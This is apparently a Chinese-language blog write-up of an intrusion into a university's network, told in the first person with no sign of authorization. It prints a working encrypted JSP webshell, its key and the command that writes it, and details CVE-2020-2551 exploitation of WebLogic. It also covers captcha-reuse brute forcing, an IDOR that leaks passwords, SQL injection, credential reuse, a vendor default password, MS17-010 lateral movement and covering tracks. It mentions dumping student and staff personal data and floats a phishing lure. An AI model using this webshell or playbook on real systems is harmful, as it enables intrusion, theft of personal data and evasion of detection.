记一次某大学渗透过程

Delina

原文链接：记一次某大学渗透过程
​
0x00 介绍一次某大学的渗透过程，整体来看比较曲折，不过最后也打到内网了
整个过程是前几个月记录的，最近有空整理分享出来
0x01 信息收集首先通过域名进入了官网
用fofa或nmap扫官网的IP，发现只开了80端口，简单测了官网无漏洞
在官网某一个链接处跳转到了某教育网IP（222开头）

​

于是用老版fofa扫l了下这个教育网IP的端口，发现不少地方可以操作
（由于fofa不是实时数据所以又用nmap进行了确认）

​

大致来看有以下服务（接下来主要内容就是围绕这些服务）

•         正方OA
  
•         强智
  
•         闭源学生管理系统
  
•         闭源人才培养系统
  
•         教师专用邮箱
  
•         Weblogic
  
  

0x02 Weblogic初窥其实看到18001端口开放大概就猜出了是Weblogic系统，等待fofa识别后果然
​
通过IIOP的CVE-2020-2551直接RCE
通过Base64编码后echo一个冰蝎shell
echo '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' | base64echo "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4K" | base64 -D | > shell.jsp成功getshell后通过冰蝎上传了一个哥斯拉shell

​

接下来就是socks5代理了，上传一个frp后发现服务端关了，事发突然并没有做什么权限维持，到手的shell飞了

​

经过分析和思考，造成这种情况的原因是直接拿了编译好的frp没做免杀，也许内网有全流量，设备报警提醒了，管理员发现异常后直接关机了。坐等开机不是办法，于是尝试其他的系统
0x03 尝试学生管理系统通过0x01的信息收集，在这个机器上开着某闭源的学生管理系统，直觉告诉我这里有可能会有突破

​

首先来测弱口令，虽然没有成功，但是发现了一些信息（后期会用到）

•         虽然有验证码但是可以复用
  
•         一个账号爆破五次后会封禁半小时
  
•         登录返回包没有敏感信息
  
  

接下来就是对JS文件的审计
发现只有很少数量的JS文件，而且大都是JS库，不存在隐藏接口一说

​

​
提取静态文件指纹到fofa搜下看看有没有相同网站，如果有相同网站可以通过弱口令进去，找到注入或者getshell后拿到源码审计，这也是一种突破思路。然而搜不到，确定是闭源项目

​

爆破下隐藏JS或敏感文件，也没有收获

​

陷入了死胡同，没有办法，只能找其它系统尝试
0x04 初窥正方OA将目光转移到正方OA
​
先拿一些已知的正方OA洞测试，由于版本等原因不能成功利用
于是想到正方OA的一个日志泄露：/log/年-月-日-log.txt或/log/年-月-日-Errorlog.txt
成功发现日志泄露，某用户（18开头手机号）做了删除表操作，得到内网IP段10，大致猜测该用户是老师或管理员

​

继续审计日志，发现了一批用户，不过这些用户ID不再是手机号

​

得到这么多的用户ID就可以造弱口令字典了
不过正方OA的验证码还是比较安全的，爆破起来很麻烦，于是想到之前的闭源学生管理系统
0x04 再探学生管理系统利用在0x03中总结的规律：虽然有验证码但是可以复用
然后就可以用弱口令来爆了（经典123456）

​

成功登陆进去

​

但是发现该账号权限特别小，只能查看一些学校的文件、发布文件等等
系统使用了ueditor1.3.6，有不少文章在这个版本下上传成功，然而这里尝试截断传马失败，有白名单
​​
由于是.net系统，数据库推断使用的是sqlserver
于是尝试找注入点，直接上sqlmap不妥，在后台能传参的地方打报错注入payload
找到一处注入后利用xp_cmdshell提权但是失败，无法getshell

​

继续挖逻辑洞，尝试找越权
发现了一处接口，通过修改请求参数中的用户ID，可以遍历出登录账号和密码
通过爆破拿到账号admin密码8XXXXXX3

​

这是一个高权限账号，可以拿下学校所有学生和教职工的信息，比如打卡信息和床位信息

​

​
​
通过这个高权限账号可以拿到一批学生账号密码（通过注入和越权都可以拿）

​

有没有可能其它系统也用这一套账号密码呢（很多人图方便多套系统密码一致）
0x05 渗透正方OA通过以上收集到的账号密码，成功进入正方OA

​

拿下多个老师账号权限，涉及到平时分、补考成绩、选课、论文等
​
做了一些后续渗透没有什么收获
0x06 登录专用邮箱找到教师专用邮箱
​
继续用这套密码测

​

成功以某教师的身份进入，发现是QQ邮箱换皮（或者是封装了一层）
这时其实可以做一些有意思的事情
比如你是信息部门的老师，可以发邮件给所有老师：最近学校内网流传病毒，请下载该文件查杀
经过思考还是算了，不能乱来
0x07 登录强智回到最初信息收集拿到的强智
​
继续用之前收集到的账号密码，成功登入
​
接下来可以看一些信息，做了一些后续渗透没有什么收获
0x08 渗透人才培养系统用老办法撞人才培养系统，发现这里并不是同一套密码
提取指纹到fofa搜索一波，发现有接近1000个站点
​
针对于其中多个站用经典路子渗透（总有一个会出弱口令哈哈）
审JS没问题，尝试挖注入，所有可传参点打报错payload，感觉有戏就上sqlmap
成功找到一处注入点（sqlserver）
​
通过注入即可拿到管理员账号密码

​

尝试用XP_CMDSHELL提权失败，渗透之路艰难

​

0x09 再探Weblogic再次打开之前拿到的Weblogic的哥斯拉shell
竟然开机了，这回要珍惜机会了
​
这回吸取经验教训，不搞frp了，用Neo-reGeorg代理，成功不被杀

​

0x0a 内网渗透成功进到内网，稍微扫了下，发现一处华为虚拟化平台，尝试弱口令Admin-Huawei@CLOUD8!成功

​

​
​
接下来测试下17010，配置下msf的路由转发，然后在内网中乱杀
​
试试弱口令（SSH，FTP，Redis等）基本一试一个准
内网的一些web系统，甚至admin-admin这种都可以直接进

​

0x0b 总结最后没有做太多的事情，关了socks隧道，删掉了马，清了msf sessions，一切就当没发生过
之前和大佬做的一些渗透，技术含量不高，现在整理出来，不足之处，大佬们别喷就行
（后来我感觉自己太菜就去做Java安全了，大佬继续在渗透领域深造）
​